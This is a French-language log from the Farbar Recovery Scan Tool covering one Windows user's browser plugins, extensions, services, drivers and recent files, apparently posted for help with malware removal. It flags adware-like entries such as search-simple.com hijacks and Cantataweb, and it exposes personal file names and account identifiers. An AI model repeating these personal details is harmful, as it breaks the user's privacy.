FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin: @nitropdf.com/NitroPDF -> C:\Program Files\Nitro\Pro 9\npnitromozilla.dll [2014-07-16] (Nitro PDF)
FF Plugin: @qq.com/npAndroidAssistant -> C:\Program Files\Common Files\Tencent\QQPhoneManager\2.0.201.3192\npQQPhoneManagerExt.dll [2014-05-30] (腾讯公司)
FF Plugin: @tracker-software.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Viewer\npPDFXCviewNPPlugin.dll [2000-01-01] (Tracker Software Products Ltd.)
FF Plugin: @videolan.org/vlc,version=2.1.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2014-02-05] (VideoLAN)
FF Plugin HKU\S-1-5-21-3295785457-3515427366-3354837301-1000: @docu-track.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Viewer\npPDFXCviewNPPlugin.dll [2000-01-01] (Tracker Software Products Ltd.)
FF Plugin HKU\S-1-5-21-3295785457-3515427366-3354837301-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Arnaud\AppData\Local\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-11] (Google Inc.)
FF Plugin HKU\S-1-5-21-3295785457-3515427366-3354837301-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Arnaud\AppData\Local\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-11] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2012-10-01] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npPDFXCviewNPPlugin.dll [2000-01-01] (Tracker Software Products Ltd.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2014-09-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2014-09-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2014-09-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2014-09-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2014-09-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll [2014-09-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin7.dll [2014-09-29] (Apple Inc.)
FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\findit.xml [2015-10-12]
FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\mystartsearch.xml [2014-12-22]
FF Extension: Skype Click to Call - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-01-03] [non signé]
FF HKLM\...\Firefox\Extensions: [faststartff@gmail.com] - C:\Users\Arnaud\AppData\Roaming\Mozilla\Firefox\Profiles\jyok94s4.default\extensions\faststartff@gmail.com => non trouvé(e)
FF HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi
FF Extension: IDM integration - C:\Program Files\Internet Download Manager\idmmzcc2.xpi [2016-01-27]
FF HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi
FF HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Arnaud\AppData\Roaming\IDM\idmmzcc5
FF Extension: IDM CC - C:\Users\Arnaud\AppData\Roaming\IDM\idmmzcc5 [2016-07-24] [non signé]

Chrome:
=======
CHR dev: Chrome dev build détecté(e)! <======= ATTENTION
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=fr-fr
CHR RestoreOnStartup: Default -> "hxxp://q.search-simple.com/?affID=pr_9334154e-2985-43d9-8500-c747aebbb3f1"
CHR StartupUrls: Default -> "hxxp://q.search-simple.com/?affID=pr_9334154e-2985-43d9-8500-c747aebbb3f1"
CHR DefaultSearchURL: Default -> hxxp://search.yahoo.com/yhs/search?hspart=ddc&hsimp=yhs-ddc_bd&type=120_pr__alt__ddc_dss_bd_com&p={searchTerms}
CHR DefaultSearchKeyword: Default -> yahoo.com
CHR DefaultNewTabURL: Default -> hxxp://search.yahoo.com/?fr=hp-ddc-bd-tab&type=999_pr__alt__ddc_dsssyctab_bd_com
CHR Plugin: (Shockwave Flash) - C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\53.0.2785.21\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Native Client) - C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\53.0.2785.21\ppGoogleNaClPluginChrome.dll => Pas de fichier
CHR Plugin: (Chrome PDF Viewer) - C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\53.0.2785.21\pdf.dll => Pas de fichier
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (EModel scriptable Plugin) - C:\Program Files\Mozilla Firefox\plugins\npEModelPlugin.dll => Pas de fichier
CHR Plugin: (Microsoft Office 2013) - C:\Program Files\Mozilla Firefox\plugins\npMeetingJoinPluginOC.dll (Microsoft Corporation)
CHR Plugin: (PDF-XChange Viewer) - C:\Program Files\Mozilla Firefox\plugins\npPDFXCviewNPPlugin.dll (Tracker Software Products Ltd.)
CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin7.dll (Apple Inc.)
CHR Plugin: (Microsoft Office 2013) - C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Foxit Reader Plugin for Mozilla) - C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
CHR Plugin: (ArchiCAD) - C:\Program Files\GRAPHISOFT\GDLWebControl\npGDLMozilla.dll (Graphisoft SE)
CHR Plugin: (Picasa) - C:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.)
CHR Plugin: (Java(TM) Platform SE 6 U32) - C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll => Pas de fichier
CHR Plugin: (VLC Web Plugin) - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Plugin: (Google Update) - C:\Users\Arnaud\AppData\Local\Google\Update\1.3.21.135\npGoogleUpdate3.dll => Pas de fichier
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32_11_5_502_135.dll => Pas de fichier
CHR Plugin: (Java Deployment Toolkit 6.0.320.5) - C:\Windows\system32\npdeployJava1.dll => Pas de fichier
CHR Profile: C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (MediaNewTab) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\ddncgmfehaelaoifpbcjnfcnigflcplp [2016-03-15]
CHR Extension: (GamingWonderland) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\eeojlpepoljdpaoiplnlhcfkoigijimc [2016-06-29]
CHR Extension: (SmarterPassword) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahdkacgpocedihpehmmhbcadaaacdmf [2016-06-29]
CHR Extension: (Bing) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2015-07-03]
CHR Extension: (Wiki Search.me) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcgnigmofekcllgbiejhmigggmgehkip [2016-07-05]
CHR Extension: (MusixHub Start) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkbhpmdajdojnnhkfgffkofkjifglkan [2015-10-09]
CHR Extension: (VideoDownloadConverter) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\ikgjglmlehllifdekcggaapkaplbdpje [2016-06-24]
CHR Extension: (MusixHub) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\jehfkemccjknagjgcbfccjajkgnbffpj [2015-10-08]
CHR Extension: (Skype) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-05-24]
CHR Extension: (FromDocToPDF) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk [2016-06-24]
CHR Extension: (Ask Search) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\mppnoffgpafgpgbaigljliadgbnhljfl [2015-08-28]
CHR Extension: (iLivid) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\nafaimnnclfjfedmmabolbppcngeolgf [2015-08-28]
CHR Extension: (IDM Integration Module) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2016-06-11]
CHR Extension: (Cantataweb) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\njolopcmjlebcohgapconpmaammpdfpk [2015-04-07] [UpdateUrl: hxxp://wwwcantatawebnet-a.akamaihd.net/update/chrome] <==== ATTENTION
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-04]
CHR Extension: (NewTabTVPlus) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohfhhhmdgchjchifbmkgkingkogpfmpb [2016-03-03]
CHR Extension: (电脑管家上网防护) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooebklgpfnbcnpokahmdidgbmlcdepkm [2016-06-22]
CHR Extension: (Chrome Media Router) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-07-04]
CHR Extension: (Skype) - C:\Users\Arnaud\AppData\Roaming\Mozila [2015-06-23]
CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-01-03]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files\Internet Download Manager\IDMGCExt.crx [2016-01-28]
CHR HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
StartMenuInternet: Google Chrome.XGGY3XEPZ4VSBPG357HB2M5PHQ - C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Services (Avec liste blanche) ========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

R2 Autodesk Content Service; C:\Program Files\Autodesk\Content Service\Connect.Service.ContentService.exe [12288 2012-12-13] (Autodesk, Inc.) [Fichier non signé]
S3 BstHdAndroidSvc; C:\Program Files\BlueStacks\HD-Service.exe [437880 2015-08-19] (BlueStack Systems, Inc.)
R2 BstHdLogRotatorSvc; C:\Program Files\BlueStacks\HD-LogRotatorService.exe [413304 2015-08-19] (BlueStack Systems, Inc.)
R2 BstHdUpdaterSvc; C:\Program Files\BlueStacks\HD-UpdaterService.exe [839288 2015-08-19] (BlueStack Systems, Inc.)
R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1363616 2014-01-03] (Microsoft Corporation) R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1748640 2014-01-03] (Microsoft Corporation) R2 CodeMeter.exe; C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe [2368912 2011-12-16] (WIBU-SYSTEMS AG) S3 FlexNet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [1064312 2014-09-29] (Flexera Software LLC) R2 hasplms; C:\Windows\system32\hasplms.exe [4466120 2013-01-11] (SafeNet Inc.) R2 HWDeviceService.exe; C:\ProgramData\DatacardService\HWDeviceService.exe [271712 2011-03-14] () R2 LuckyBrowse; C:\Program Files\LuckyBrowse\app\luckyBrowseStarter.exe [281600 2015-09-17] () [Fichier non signé] R2 MATLAB License Server; C:\Program Files\MATLAB\R2010b\etc\win32\lmgrd.exe [1500424 2010-07-01] (Acresso Software Inc.) R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation) S4 msvsmon80; C:\Program Files\Microsoft Visual Studio 8\Common7\IDE\Remote Debugger\x86\msvsmon.exe [2799808 2005-09-23] (Microsoft Corporation) S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation) R2 NitroDriverReadSpool9; C:\Program Files\Nitro\Pro 9\NitroPDFDriverService9.exe [197128 2014-07-16] (Nitro PDF Software) R2 NitroUpdateService; C:\Program Files\Nitro\Pro 9\Nitro_UpdateService.exe [392712 2014-07-16] () R2 RCdsrv2; C:\Windows\system32\rcdsrv.exe [32768 2005-01-31] () [Fichier non signé] R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService.exe [142408 2013-01-18] (Realtek Semiconductor) S2 SNS EVDO-Huawei. 
RunOuc; C:\Program Files\SNS EVDO-Huawei\UpdateDog\ouc.exe [655712 2016-01-21] () S3 SwitchBoard; C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [Fichier non signé] S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation) S2 ApplicationHosting; C:\ProgramData\\ApplicationHosting\\ApplicationHosting.exe -f "C:\ProgramData\\ApplicationHosting\\ApplicationHosting.dat" -l -a S2 cohci1394; "C:\Program Files\Controller\cohc.exe" /s iid=1932266 did=APSnapdoAMRev sid=3 ref=8a70a76f-600a-03c8-d59c-6e8a8dc0e842-PolicyMac id=6c8746ea48dfa61e2306f466d7e83d17367e44fe3a3fa6860457de4adf7a73f8 [X] S2 Saophase; C:\ProgramData\\Saophase\\Saophase.exe -f "C:\ProgramData\\Saophase\\Saophase.dat" -l -a S2 Update Cantataweb; "C:\Program Files\Cantataweb\updateCantataweb.exe" [X] S2 Util Cantataweb; pas de ImagePath ===================== Pilotes (Avec liste blanche) ========================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R2 aksfridge; C:\Windows\system32\drivers\aksfridge.sys [376200 2013-02-19] (SafeNet Inc.) R2 BstHdDrv; C:\Program Files\BlueStacks\HD-Hypervisor-x86.sys [132216 2015-08-19] (BlueStack Systems) R2 hardlock; C:\Windows\system32\drivers\hardlock.sys [608136 2013-03-07] (SafeNet Inc.) 
R0 iaStorA; C:\Windows\System32\DRIVERS\iaStorA.sys [526904 2012-12-11] (Intel Corporation) R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [25656 2012-12-11] (Intel Corporation) R0 iusb3hcs; C:\Windows\System32\DRIVERS\iusb3hcs.sys [16440 2012-12-04] (Intel Corporation) R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation) R3 NETwNs32; C:\Windows\System32\DRIVERS\Netwsn00.sys [10372096 2012-12-06] (Intel Corporation) S3 NETwNv32; C:\Windows\System32\DRIVERS\NETwNv32.sys [6923264 2011-01-19] (Intel Corporation) R3 rtsuvc; C:\Windows\System32\DRIVERS\rtsuvc.sys [6357648 2012-09-19] (Realtek Semiconductor Corp.) R1 SCDEmu; C:\Windows\system32\Drivers\SCDEmu.sys [112096 2012-02-09] (Power Software Ltd) R0 sptd; C:\Windows\System32\Drivers\sptd.sys [721904 2014-09-28] () [Fichier non signé] S3 TSSK; C:\Windows\System32\tssk.sys [83576 2016-03-16] (电脑管家) R3 wacomrouterfilter; C:\Windows\System32\DRIVERS\wacomrouterfilter.sys [13296 2012-12-20] (Wacom Technology) R1 {01858d74-83fb-44eb-a0f3-805eed34f689}Gw; C:\Windows\System32\drivers\{01858d74-83fb-44eb-a0f3-805eed34f689}Gw.sys [43152 2015-01-06] (StdLib) R1 {8049d9d8-3550-48db-8757-eed8d076dc3f}Gw; C:\Windows\System32\drivers\{8049d9d8-3550-48db-8757-eed8d076dc3f}Gw.sys [43152 2015-01-12] (StdLib) R1 {a3683581-618c-4715-bb65-8cadd4684acf}Gw; C:\Windows\System32\drivers\{a3683581-618c-4715-bb65-8cadd4684acf}Gw.sys [43152 2014-12-21] (StdLib) R1 {fddd69d0-0a0b-432c-b520-59801bbefc91}Gw; C:\Windows\System32\drivers\{fddd69d0-0a0b-432c-b520-59801bbefc91}Gw.sys [43152 2015-01-09] (StdLib) U3 apfy20vx; C:\Windows\system32\Drivers\apfy20vx.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zéro octet Fichier/Dossier) S3 hwusb_cdcacm; system32\DRIVERS\ew_cdcacm.sys [X] S3 hwusb_wwanecm; system32\DRIVERS\ew_wwanecm.sys [X] U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [102272 2015-12-23] (Huawei Technologies Co., Ltd.) 
[Fichier non signé] S1 QMUdisk; \??\C:\Program Files\Tencent\QQPCMgr\11.6.17645.227\QMUdisk.sys [X] S3 softaal; \??\C:\Program Files\Tencent\QQPCMgr\11.6.17645.227\softaal.sys [X] S1 SRepairDrv; \??\C:\Program Files\Tencent\QQPCMGR\SRepairDrv [X] S3 TcHardWare; \??\C:\Program Files\Tencent\QQPCMgr\11.6.17645.227\QQPCHW.sys [X] S2 tsnethlp; \??\C:\Program Files\Tencent\QQPCMgr\11.6.17645.227\TsNetHlp.sys [X] ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois - Créés - fichiers et dossiers ======== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2016-07-25 11:18 - 2016-07-25 11:19 - 00000000 ____D C:\FRST 2016-07-24 20:18 - 2016-07-24 20:18 - 00000000 ____H C:\ProgramData\cm-lock 2016-07-24 20:18 - 2016-07-24 20:18 - 00000000 ____D C:\Windows\LastGood 2016-07-24 20:18 - 2007-11-09 11:00 - 00023640 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\TVALZ_O.SYS 2016-07-22 16:03 - 2016-07-22 16:03 - 00096831 _____ C:\Users\Arnaud\Desktop\ACFrOgD_rwSF15oK0yyu0cFNxorx8M7HyoFo_NAIg5PNDQVibbZYZxuRMHs83h02YzUkQ7J2q8E9964uoubXv9kw-gyRsfK2a696wTX6UlqECYFR0daJfx9SvD8aG9I=.pdf 2016-07-22 15:38 - 2016-07-22 15:38 - 00000036 _____ C:\Users\Arnaud\AppData\Local\housecall.guid.cache 2016-07-22 12:08 - 2016-07-22 12:09 - 00360675 _____ C:\Users\Arnaud\Downloads\Dossier Administratif0001.pdf 2016-07-21 15:03 - 2016-07-21 15:03 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\Smadav 2016-07-21 15:03 - 2016-07-21 15:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SMADAV Antivirus 2016-07-21 10:45 - 2016-07-25 11:18 - 00001455 _____ C:\Users\Arnaud\Desktop\Internet Explorer.lnk 2016-07-21 10:45 - 2016-07-25 11:18 - 00001455 _____ C:\Users\Arnaud\Desktop\Google Chrome.lnk 2016-07-20 14:07 - 2016-07-20 14:07 - 01042871 
_____ C:\Users\Arnaud\Desktop\DIPET.PDF 2016-07-19 16:30 - 2016-07-19 16:30 - 00190756 _____ C:\Users\Arnaud\Downloads\lettre de motivation.pdf 2016-07-19 15:59 - 2016-07-19 15:59 - 00109731 _____ C:\Users\Arnaud\Downloads\CV.pdf 2016-07-19 12:18 - 2016-07-19 12:18 - 00142892 _____ C:\Users\Arnaud\Downloads\Montage Structures Métalliques Centre GPL Bertoua.pdf 2016-07-19 10:38 - 2016-07-19 10:40 - 04294376 _____ C:\Users\Arnaud\Downloads\CATALOGUE CONSTRUCTION MODULAIRE 2016.pdf 2016-07-18 17:12 - 2016-07-18 17:12 - 00220719 _____ C:\Users\Arnaud\Downloads\cameroun3_profession.pdf 2016-07-16 14:09 - 2016-07-16 14:09 - 00571056 _____ C:\Users\Arnaud\Desktop\CV-ndjemeli.pdf 2016-07-16 13:22 - 2016-07-16 13:23 - 02063077 _____ C:\Users\Arnaud\Downloads\Pièces jointes_2016716.zip 2016-07-16 12:28 - 2016-07-16 12:28 - 00000000 _____ C:\Users\Arnaud\Downloads\Curriculum_Vitae_detaille.pdf 2016-07-16 12:28 - 2016-07-16 12:28 - 00000000 _____ C:\Users\Arnaud\Downloads\Curriculum_Vitae_detaille (1).pdf 2016-07-15 16:54 - 2016-07-15 16:59 - 00000000 ____D C:\Users\Arnaud\Desktop\Nouveau dossier 2016-07-15 16:51 - 2016-07-15 16:51 - 00073168 _____ C:\Users\Arnaud\Downloads\ETUDIANTS FGI 2012-2013 (2).xlsx 2016-07-14 12:07 - 2016-07-14 12:07 - 00000987 _____ C:\Users\Arnaud\Desktop\The Logo Creator v5.exe.lnk 2016-07-14 12:07 - 2016-07-14 12:07 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Logo Creator v5 2016-07-14 12:07 - 2016-07-14 12:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Logo Creator v5 2016-07-14 12:05 - 2016-07-14 12:07 - 00000000 ____D C:\Program Files\The Logo Creator v5 2016-07-13 13:17 - 2016-07-13 13:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SuperCopier2 2016-07-13 12:47 - 2016-07-13 12:47 - 00001206 _____ C:\ProgramData\ProgramData.lnk.lnk 2016-07-12 16:11 - 2016-07-13 12:47 - 00000000 _RSHD C:\Skypee 2016-07-12 16:10 - 2016-07-23 13:43 - 00000000 
_RSHD C:\Google 2016-07-12 13:35 - 2016-07-12 13:37 - 02345909 _____ C:\Users\Arnaud\Downloads\CEMS PROMOTION PDF.pdf 2016-07-12 13:30 - 2016-07-12 13:30 - 00050668 _____ C:\Users\Arnaud\Downloads\CV julien.pdf 2016-07-05 11:55 - 2016-07-05 11:55 - 00125092 _____ C:\Users\Arnaud\Downloads\calscol2017fr.pdf 2016-07-04 11:29 - 2016-07-04 11:29 - 00011741 _____ C:\Users\Arnaud\Downloads\Liste_des_apprenants_ER.xlsx 2016-07-04 09:10 - 2016-07-04 09:11 - 00030109 _____ C:\Users\Arnaud\Downloads\RAPPORT HEBDO.xlsx 2016-06-28 15:32 - 2016-06-28 15:32 - 14634624 _____ (BlueStack Systems Inc.) C:\Users\Arnaud\Downloads\bluestacks-2.exe 2016-06-28 15:32 - 2016-06-28 15:32 - 00001807 _____ C:\Users\Public\Desktop\Apps.lnk 2016-06-28 15:32 - 2016-06-28 15:32 - 00001725 _____ C:\Users\Public\Desktop\Start BlueStacks.lnk 2016-06-28 15:29 - 2016-06-28 15:29 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BlueStacks 2016-06-28 15:29 - 2016-06-28 15:29 - 00000000 ____D C:\ProgramData\BlueStacks 2016-06-28 15:29 - 2016-06-28 15:29 - 00000000 ____D C:\Program Files\BlueStacks 2016-06-28 15:27 - 2016-06-28 15:27 - 00000000 ____D C:\Users\Arnaud\AppData\Local\Bluestacks 2016-06-28 15:23 - 2016-06-28 15:23 - 14634624 _____ (BlueStack Systems Inc.) 
C:\Users\Arnaud\Downloads\bluestacks-2 [1].exe 2016-06-28 15:23 - 2016-06-28 15:23 - 00001773 _____ C:\Users\Arnaud\Desktop\MyPC Backup.lnk 2016-06-28 15:23 - 2016-06-28 15:23 - 00000000 ____D C:\Program Files\OLBPre 2016-06-28 12:18 - 2016-06-28 12:35 - 30071931 _____ C:\Users\Arnaud\Downloads\WhatsApp Messenger_v2.16.141_apkpure.com.apk 2016-06-28 12:18 - 2016-06-28 12:22 - 08339432 _____ C:\Users\Arnaud\Downloads\MyEasyLight_v0.0.2_apkpure.com.apk 2016-06-28 11:30 - 2016-06-28 11:30 - 00894695 _____ C:\Users\Arnaud\Downloads\facebook-amelietsapiyomei (1).zip 2016-06-28 10:51 - 2016-06-28 10:51 - 00000000 ____D C:\Program Files\Common Files\Aladdin Shared 2016-06-28 10:51 - 2013-02-19 15:17 - 00376200 _____ (SafeNet Inc.) C:\Windows\system32\Drivers\aksfridge.sys 2016-06-28 10:51 - 2013-01-11 16:36 - 04466120 _____ (SafeNet Inc.) C:\Windows\system32\hasplms.exe 2016-06-28 10:51 - 2013-01-11 16:36 - 04466120 _____ (SafeNet Inc.) C:\Windows\system32\aksllmtp.exe 2016-06-28 10:50 - 2013-01-14 12:34 - 00198088 _____ (Aladdin Knowledge Systems Ltd.) C:\Windows\system32\hlvdd.dll 2016-06-28 10:49 - 2016-06-28 10:49 - 00000000 ____D C:\Program Files\Terrasol ==================== Un mois - Modifiés - fichiers et dossiers ======== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 
2016-07-25 11:15 - 2014-11-23 12:15 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\uTorrent 2016-07-25 11:08 - 2016-05-09 19:14 - 00011264 _____ C:\Users\Arnaud\AppData\Roaming\CDRusersDB.v12 2016-07-25 11:05 - 2014-11-02 22:43 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\Nitro PDF 2016-07-25 10:54 - 2014-11-03 20:46 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\TeraCopy 2016-07-25 10:54 - 2014-09-23 21:21 - 00000000 ____D C:\Users\Arnaud\Desktop\AUTO ECOLE 2016-07-25 10:50 - 2014-09-27 15:26 - 00001002 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job 2016-07-24 20:29 - 2014-09-27 15:22 - 00000000 __SHD C:\[Smad-Cage] 2016-07-24 20:24 - 2009-07-14 05:34 - 00032928 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2016-07-24 20:24 - 2009-07-14 05:34 - 00032928 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2016-07-24 20:19 - 2014-09-27 15:28 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\Skype 2016-07-24 20:16 - 2016-04-01 09:16 - 00000000 ____D C:\Users\Arnaud\AppData\LocalLow\uTorrent 2016-07-24 20:16 - 2009-07-14 05:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2016-07-24 20:14 - 2015-08-19 10:43 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\DMCache 2016-07-24 18:11 - 2011-02-14 09:02 - 00810618 _____ C:\Windows\system32\perfh00C.dat 2016-07-24 18:11 - 2011-02-14 09:02 - 00173194 _____ C:\Windows\system32\perfc00C.dat 2016-07-24 18:11 - 2010-11-20 22:01 - 01844980 _____ C:\Windows\system32\PerfStringBackup.INI 2016-07-24 18:11 - 2009-07-14 03:37 - 00000000 ____D C:\Windows\inf 2016-07-22 12:29 - 2015-08-10 09:39 - 02303488 ___SH C:\Users\Arnaud\Desktop\Thumbs.db 2016-07-21 15:03 - 2014-09-27 15:22 - 00000982 _____ C:\Users\Public\Desktop\SMADΔV.lnk 2016-07-21 15:03 - 2014-09-27 15:22 - 00000000 ____D C:\Program Files\SMADAV 2016-07-21 10:59 - 2014-09-27 15:32 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\vlc 